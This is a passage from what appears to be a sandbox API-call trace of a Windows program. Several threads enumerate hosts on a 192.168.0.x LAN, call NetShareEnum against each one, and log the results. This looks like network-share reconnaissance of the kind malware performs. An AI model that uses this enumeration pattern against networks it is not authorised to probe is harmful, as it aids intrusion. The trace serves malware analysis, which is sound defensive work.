lpWideCharStr=0x4b5ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.191] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.191] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.191] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x33, lpNumberOfBytesWritten=0x4b5fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x4b5fc54*=0x33, lpOverlapped=0x0) returned 1 [0211.271] NetShareEnum (in: servername="\\\\192.168.0.214", level=0x1, bufptr=0x4b5fedc, prefmaxlen=0xffffffff, entriesread=0x4b5fed4, totalentries=0x4b5fed0, resume_handle=0x4b5fecc | out: bufptr=0x4b5fedc, entriesread=0x4b5fed4, totalentries=0x4b5fed0, resume_handle=0x4b5fecc) returned 0x35 [0258.063] SetEvent (hEvent=0x1dc) returned 1 [0258.063] RtlExitUserThread (Status=0x0) Thread: id = 54 os_tid = 0xc6c [0088.689] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.33", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.689] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.33", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.33", lpUsedDefaultChar=0x0) returned 14 [0088.689] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4c9ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.689] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.689] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.689] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4c9ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.689] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.689] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.689] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x4c9fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x4c9fc54*=0x10, lpOverlapped=0x0) returned 1 [0088.694] NetShareEnum (in: servername="\\\\192.168.0.33", level=0x1, bufptr=0x4c9fedc, prefmaxlen=0xffffffff, entriesread=0x4c9fed4, totalentries=0x4c9fed0, resume_handle=0x4c9fecc | out: bufptr=0x4c9fedc, entriesread=0x4c9fed4, totalentries=0x4c9fed0, resume_handle=0x4c9fecc) returned 0x35 [0144.530] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.120", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0144.530] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.120", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.120", lpUsedDefaultChar=0x0) returned 15 [0144.530] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4c9ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.530] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.530] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.530] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4c9ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.530] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.530] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.530] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x4c9fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x4c9fc54*=0x11, lpOverlapped=0x0) returned 1 [0144.534] NetShareEnum (in: servername="\\\\192.168.0.120", level=0x1, bufptr=0x4c9fedc, prefmaxlen=0xffffffff, entriesread=0x4c9fed4, totalentries=0x4c9fed0, resume_handle=0x4c9fecc | out: bufptr=0x4c9fedc, entriesread=0x4c9fed4, totalentries=0x4c9fed0, resume_handle=0x4c9fecc) returned 0x35 [0178.191] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.149", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.191] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.149", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.149", lpUsedDefaultChar=0x0) returned 15 [0178.191] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4c9ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.191] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.191] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.191] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4c9ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.191] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.191] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.191] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x4c9fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x4c9fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.195] NetShareEnum (in: servername="\\\\192.168.0.149", level=0x1, bufptr=0x4c9fedc, prefmaxlen=0xffffffff, entriesread=0x4c9fed4, totalentries=0x4c9fed0, resume_handle=0x4c9fecc | out: bufptr=0x4c9fedc, entriesread=0x4c9fed4, totalentries=0x4c9fed0, resume_handle=0x4c9fecc) returned 0x35 [0211.190] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.213", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.190] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.213", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.213", lpUsedDefaultChar=0x0) returned 15 [0211.190] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4c9ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.190] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.190] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.190] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4c9ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.190] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.190] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.190] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x4c9fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x4c9fc54*=0x22, lpOverlapped=0x0) returned 1 [0211.267] NetShareEnum (in: servername="\\\\192.168.0.213", level=0x1, bufptr=0x4c9fedc, prefmaxlen=0xffffffff, entriesread=0x4c9fed4, totalentries=0x4c9fed0, resume_handle=0x4c9fecc | out: bufptr=0x4c9fedc, entriesread=0x4c9fed4, totalentries=0x4c9fed0, resume_handle=0x4c9fecc) returned 0x35 [0258.060] SetEvent (hEvent=0x1dc) returned 1 [0258.060] RtlExitUserThread (Status=0x0) Thread: id = 55 os_tid = 0xc74 [0088.695] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.34", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.695] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.34", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.34", lpUsedDefaultChar=0x0) returned 14 [0088.695] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4ddec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.695] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.695] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.695] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4ddec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.696] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.696] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.696] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x4ddfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x4ddfc54*=0x10, lpOverlapped=0x0) returned 1 [0088.699] NetShareEnum (in: servername="\\\\192.168.0.34", level=0x1, bufptr=0x4ddfedc, prefmaxlen=0xffffffff, entriesread=0x4ddfed4, totalentries=0x4ddfed0, resume_handle=0x4ddfecc | out: bufptr=0x4ddfedc, entriesread=0x4ddfed4, totalentries=0x4ddfed0, resume_handle=0x4ddfecc) returned 0x35 [0144.540] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.121", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0144.540] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.121", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.121", lpUsedDefaultChar=0x0) returned 15 [0144.540] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4ddec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.540] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.540] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.540] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4ddec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.540] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.540] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.540] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x4ddfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x4ddfc54*=0x11, lpOverlapped=0x0) returned 1 [0144.547] NetShareEnum (in: servername="\\\\192.168.0.121", level=0x1, bufptr=0x4ddfedc, prefmaxlen=0xffffffff, entriesread=0x4ddfed4, totalentries=0x4ddfed0, resume_handle=0x4ddfecc | out: bufptr=0x4ddfedc, entriesread=0x4ddfed4, totalentries=0x4ddfed0, resume_handle=0x4ddfecc) returned 0x35 [0178.197] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.150", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.197] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.150", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.150", lpUsedDefaultChar=0x0) returned 15 [0178.197] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4ddec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.197] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.197] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.197] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4ddec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.197] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.197] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.197] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x4ddfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x4ddfc54*=0x11, lpOverlapped=0x0) returned 1 [0178.203] NetShareEnum (in: servername="\\\\192.168.0.150", level=0x1, bufptr=0x4ddfedc, prefmaxlen=0xffffffff, entriesread=0x4ddfed4, totalentries=0x4ddfed0, resume_handle=0x4ddfecc | out: bufptr=0x4ddfedc, entriesread=0x4ddfed4, totalentries=0x4ddfed0, resume_handle=0x4ddfecc) returned 0x35 [0211.214] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.254", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.214] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.254", cchWideChar=15, lpMultiByteStr=0x1e8336c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.254", lpUsedDefaultChar=0x0) returned 15 [0211.214] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x4ddfc2c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x4ddfc2c*=0x80, lpOverlapped=0x0) returned 1 [0211.499] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4ddec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.499] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.499] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.499] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4ddec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.499] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.500] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.500] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x4ddfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x4ddfc54*=0x11, lpOverlapped=0x0) returned 1 [0211.500] NetShareEnum (in: servername="\\\\192.168.0.254", level=0x1, bufptr=0x4ddfedc, prefmaxlen=0xffffffff, entriesread=0x4ddfed4, totalentries=0x4ddfed0, resume_handle=0x4ddfecc | out: bufptr=0x4ddfedc, entriesread=0x4ddfed4, totalentries=0x4ddfed0, resume_handle=0x4ddfecc) returned 0x35 [0257.998] SetEvent (hEvent=0x1dc) returned 1 [0257.998] RtlExitUserThread (Status=0x0) Thread: id = 56 os_tid = 0xc78 [0088.781] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.38", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.781] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.38", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.38", lpUsedDefaultChar=0x0) returned 14 [0088.781] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4f1ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.781] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.781] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.781] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4f1ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.781] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.781] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.781] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x4f1fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x4f1fc54*=0x10, lpOverlapped=0x0) returned 1 [0088.876] NetShareEnum (in: servername="\\\\192.168.0.38", level=0x1, bufptr=0x4f1fedc, prefmaxlen=0xffffffff, entriesread=0x4f1fed4, totalentries=0x4f1fed0, resume_handle=0x4f1fecc | out: bufptr=0x4f1fedc, entriesread=0x4f1fed4, totalentries=0x4f1fed0, resume_handle=0x4f1fecc) returned 0x35 [0144.313] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.99", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0144.313] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.99", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.99", lpUsedDefaultChar=0x0) returned 14 [0144.313] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, 